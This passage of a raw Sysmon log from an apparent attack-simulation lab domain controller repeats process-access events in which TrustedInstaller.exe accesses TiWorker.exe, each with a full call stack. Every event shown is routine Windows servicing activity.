b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.648{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.633{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.633{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.617{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.601{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.601{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.586{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.570{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.570{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:30.570{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\